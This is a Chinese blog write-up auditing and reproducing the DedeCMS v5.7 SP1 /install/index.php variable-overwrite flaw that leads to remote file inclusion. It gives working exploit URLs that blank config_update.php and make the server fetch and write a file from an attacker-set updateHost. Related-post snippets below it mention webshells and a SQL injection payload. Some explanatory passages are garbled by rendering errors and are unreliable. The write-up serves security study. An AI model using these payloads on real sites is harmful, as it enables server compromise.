dedecmsv5.7sp1远程文件包含漏洞审计

最新推荐文章于 2024-08-04 22:42:40 发布
最新推荐文章于 2024-08-04 22:42:40 发布
阅读量816 收藏 4
点赞数
文章标签: 渗透 审计 dedecms
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42652002/article/details/102762694
版权

漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖以至于最后引起远程文件包含漏洞。
1.代码覆盖


这段代码段就是变量覆盖产生的地方,大致意思是将get,post或者cookie方式传入的值通过foreach以键值对的方式输出,例如在url中输入 ?hi=hello,则 k 的 值 就 是 s t r , _k的值就是str, kstr_v的值就是hello 所以 KaTeX parse error: Expected '}', got 'EOF' at end of input: {_K}就是$hi,这里很明显的变量覆盖了。

2.利用变量覆盖构造远程文件包含
在这里插入图片描述
分析这段漏洞代码,我们可以知道首先引入了**…/data/admin/config_update.php**这个文件。内容为:
在这里插入图片描述

变量updateHost由该文件引入,远程去访问http://updatenew.dedecms.com/base-v57/dedecms/demodata.{KaTeX parse error: Expected 'EOF', got '}' at position 7: s_lang}̲.txt这个文件***(s_lang为带输入的文件变量名)***,通过file_get_contents函数将 内容写入,写入到$install_demo_name中,如果内容存在就提示存在,如果不存在就报错。

3.漏洞复现
首先访问/install/index.php
在这里插入图片描述
存在。构造payload再次访问,此时***清空config_update.php文件***。
/install/index.php?step=11&s_lang=Quanqua&insLockfile=Quanqua&install_demo_name=…/data/admin/config_update.php
在这里插入图片描述

因为远程肯定不存在demodata.Quanqua.txt并且此时有***&install_demo_name=…/data/admin/config_update.php***,相当于重新创建了一个空文件config_update.php,覆盖了原来的config_update.php。可以看到此时文件已经被清空。
在这里插入图片描述
这时可以利用变量覆盖来远程包含我们的文件了。
/install/index.php?step=11&s_lang=Quanqua&insLockfile=Quanqua&install_demo_name=…/Quanqua.php&updateHost=http://127.0.0.1/
在这里插入图片描述
在这里插入图片描述

此时我们本地的/Quanqua.txt文件已经写入目标服务器,并且重新命名为/Quanqua.php。
在这里插入图片描述

小诗不识月、
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)
午夜安全
11-17 3664
《WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2) 接着上一篇,我们已经获取到一个webshell,这篇文章是后续提权及漏洞利用。(1)systeminfo生成文件systeminfo >dedecms.txt(2)更新windows-exploit-suggester下载windows-exploit-suggester.py后,先安装xlrd,之后才可以更新。...
dedecms远程文件包含漏洞
weixin_43778463的博客
11-06 1076
dedecms远程文件包含漏洞
DeDeCMS-漏洞复现
最新发布
Jz031212的博客
08-04 248
2.上传后访问你上传的一句话木马文件 我这里写的一句话木马为phpinfo,显示成功即可证明注入。4.点击生成--更新主页html,将htm后缀改成php并且生成静态,点击更新主页html。5.访问此页面,没有报错证明注入成功(由于没有回显,这里输入的POST传参)1.点击核心--文件式管理器 点击文件上传,将我们的一句话木马进行上传。2.进入后点击模板--默认模板管理,找到index.htm。1.点击模板--广告管理--生成一个新广告。3.点击右方的编辑进入后改成写入的。5.给出一个更新后的路径。
【学习笔记】DedeCMS 5.7 /install/index.php 远程文件包含漏洞
chualam的博客
11-02 678
变量覆盖:用我们自己自定义的参数替换程序原有的变量值 一般需要结合程序其他功能来形成完整的攻击 原本带有变量覆盖功能的函数 extract 和prase_str 或者是全局变量导致的覆盖 $$key = $abc $key = '123' $123 = $abc 如果我们可以控制$key 就可以实现变量的覆盖 想想是否可以让require _once变成空 这样就可以成功覆盖了 ...
dedecms最新版本存在远程包含漏洞--可getshell
pygain的博客
11-01 2252
小编最近发现,9月中旬发布的织梦CMS,由于管理员疏忽易存在远程包含漏洞,可getshell
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现)
kid的博客
06-05 6036
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现) 前言 前面看一个视频提到这个漏洞的复现,自己觉得这种漏洞复现然后分析原因还是蛮有意思的,所以这里也来实现一下这个漏洞的复现,自己动手还是很重要的一个过程吧 过程 首先是搭建环境,phpstudy + dedecms5.7 sp1基本是一键安装 漏洞原因主要是在install的index.php文件中 foreach(Array('_...
dedecmsv5.7sp1 文件包含和变量覆盖漏洞
小饼干的博客
06-28 1028
环境搭建:使用phpstudy,phpstudy版本2016,PHP版本5.4.45,mysql版本5.5.53 dedecms版本5.7 sp1 utf-8版 环境搭建好以后安装dedecms,安装完成以后访问一下 存在漏洞的地方在install/index.php文件中 在29到33行中存在变量覆盖,这段代码的大概意思是依次对_GET,_POST,_COOKIE进行键值分离 例如:_GET传入的参数是id=1,name=nfnf,在第一个foreach中先遍历_GET,此时$_request变为$_g
DeDeCMSV5.7SP2漏洞复现B
worker___的博客
12-14 2129
一. 实验内容、原理 复现环境 PHP 5.6、DeDeCMSV5.7SP2 正式版(2018-01-09) 复现工具 DeDeCMSV5.7SP2 正式版(2018-01-09) HackBar/Max HacKBar 插件 (后者火狐专有) Proxy SwitchyOmega 插件 Burp Suite 抓包工具 phpstudypro 建站工具 Google Chrome/Firefox 浏览器 二. 实验过程 DeceCMS v5.7 SP2正式版前台任意修改用...
DedeCmsV5.7-UTF8-Final
06-08
DedeCmsV5.7-UTF8-Final
DedeCMS5.7SP1系统/plus/download.php出现url重定向漏洞
Feng的专栏
09-05 1722
文章转自:http://www.dedecms8.com/dedecms/use/11316.html       最近使用scanv网站体检发现有DedeCMS 5.7SP1 /plus/download.php url重定向漏洞(如下图),对比官方网站最新下载包发现该漏洞未进行补丁,但官方自身网站已经补上了,而官方演示站点均未补上。   漏洞原因和解决思路如下:
dede CMS最新采集规则
10-06
dede CMS 最新采集规则 包含 60多个各种采集规则
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)
WY92139010的博客
08-14 1072
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553) 一、漏洞描述 该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖,以至于最后引起远程文件包含漏洞。 二、漏洞影响版本 DeDeCMS < 5.7-sp1,包括5.7 sp1版本 三、漏洞环境搭建 1、下载DeDeCMS V...
dedecms漏洞
https://www.cnblogs.com/zpchcbd/
05-10 2803
5.7 sp1 爆数据库 /plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&a...
DedeCMS_v5.7_友情链接CSRF+任意文件写入漏洞
公众号shadow sock7
11-28 2770
参考:https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell 略鸡肋,需要管理员点击。 先在网站最下面点击“申请加入”,然后填入构造的网站链接: http://192.168.170.139:8888/dedecms_csrf.php 然后该链接需要服务器后台可以访问的地址即...
DedeCMS_v5.7漏洞复现
热门推荐
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
Dedecms织梦远程写文件漏洞
鸥鹭忘机
07-28 974
基本信息 漏洞编号:SSV-89354 CVE-ID:CVE-2015-4553 漏洞类别:变量覆盖 实验版本:dedecms v5.7SP1(部分版本已修复) 利用条件:Apache,dedecms版本为v5.7SP且未修复,自备一台云主机 云主机ip:192.168.18.131 参考文章:http://blog.nsfocus.net/dedecms-write-file-vuln/ https://seclists.org/fulldisclosure/2015/Jun/47 2015年6月17日
DedeCMS5.7远程文件包含漏洞分析
shelter1234567的博客
09-13 374
访问第二个payload,由于../data/admin/config_update.php为空 $updateHost失去了定义,可以被变量覆盖到, $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";利用 $install_demo_name可控的方式将config_update.php 写入空 让其中的$updateHost失去定义, 写入空执行找不到对应的文件为空, $sql_content 自然就为空。如果业务还有以下代码。
批量采集URL神器:Serein,图形化工具提升安全检测效率
Serein还特别提到了针对ActivelyExploitedAtlassianConfluence0DayCVE-2022-26134和DedeCMSv5.7.87SQL注入CVE-2022-23337这两个具体漏洞的批量检测能力。" 在当前的数字化时代,移动安全已经成为一个至关重要的领域...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值